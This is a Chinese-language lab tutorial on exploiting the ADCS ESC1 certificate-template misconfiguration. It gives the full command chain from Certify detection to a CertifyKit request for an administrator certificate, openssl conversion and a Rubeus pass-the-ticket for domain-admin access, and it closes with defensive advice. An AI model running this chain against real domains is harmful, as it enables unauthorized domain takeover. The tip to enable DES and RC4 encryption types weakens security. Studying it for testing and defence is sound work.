实战ADCS漏洞利用从零构建ESC1攻击链的完整指南Active Directory证书服务(ADCS)作为企业身份验证基础设施的核心组件其安全配置往往被低估。当证书模板配置不当攻击者可能利用ESC1漏洞实现从普通域用户到域管理员的权限提升。本文将带您搭建实验环境逐步演示如何利用GhostPack工具链完成完整的攻击路径。1. 环境搭建与漏洞原理在开始实战前我们需要理解ESC1漏洞的成因。ADCS中的证书模板如果同时满足三个条件就可能存在权限提升风险允许请求者指定主题备用名称(Subject Alternative Name, SAN)包含客户端身份验证扩展密钥用法(EKU)向普通域用户授予注册权限典型的易受攻击模板配置如下表所示配置项安全设置危险设置使用者名称从Active Directory构建在请求中提供应用程序策略服务器身份验证客户端身份验证安全权限仅限管理员注册认证用户可注册提示实验室环境中建议使用Windows Server 2019作为域控制器和CA服务器避免旧版本可能出现的兼容性问题。2. 漏洞检测与工具准备GhostPack的Certify工具是检测ADCS漏洞的利器。以下是完整的检测流程# 下载并编译Certify git clone https://github.com/GhostPack/Certify cd Certify msbuild /p:ConfigurationRelease检测漏洞模板的命令行操作Certify.exe find /vulnerable典型输出中需要关注三个关键指标msPKI-Certificate-Name-Flag包含ENROLLEE_SUPPLIES_SUBJECTpkiextendedkeyusage包含客户端身份验证安全描述符中Authenticated Users具有Enroll权限3. 证书申请与格式转换发现漏洞模板后使用CertifyKit申请域管理员证书CertifyKit.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator得到的PEM格式证书需要转换为PFX格式才能用于Kerberos认证openssl pkcs12 -in cert.pem -keyex -CSP Microsoft Enhanced Cryptographic Provider v1.0 -export -out cert.pfx常见错误及解决方案KRB-ERROR (62)检查CA证书是否被域控制器信任访问被拒绝确保证书包含正确的SAN和EKU设置模板不可见验证当前用户是否具有注册权限4. Kerberos票据获取与权限提升使用Rubeus工具将证书注入Kerberos认证流程Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.52.131 /ptt成功执行后您将观察到以下变化当前会话获得域管理员权限可以访问域控上的敏感资源如\\DC\C$能够执行域管理操作如添加用户到特权组5. 防御措施与检测建议为防止此类攻击管理员应采取以下防护措施证书模板加固禁用ENROLLEE_SUPPLIES_SUBJECT标志限制客户端身份验证EKU的使用范围遵循最小权限原则配置注册权限监控与检测审计异常证书申请行为监控Kerberos服务票据请求建立证书模板变更审批流程架构优化将CA服务器与域控制器物理分离实施证书颁发策略限制定期审查证书模板配置在实际渗透测试中遇到KRB-ERROR (62)错误时检查组策略中的加密类型设置往往能解决问题。将以下类型全部启用通常可以恢复认证流程AES256_HMAC_SHA1AES128_HMAC_SHA1RC4_HMAC_MD5DES_CBC_MD5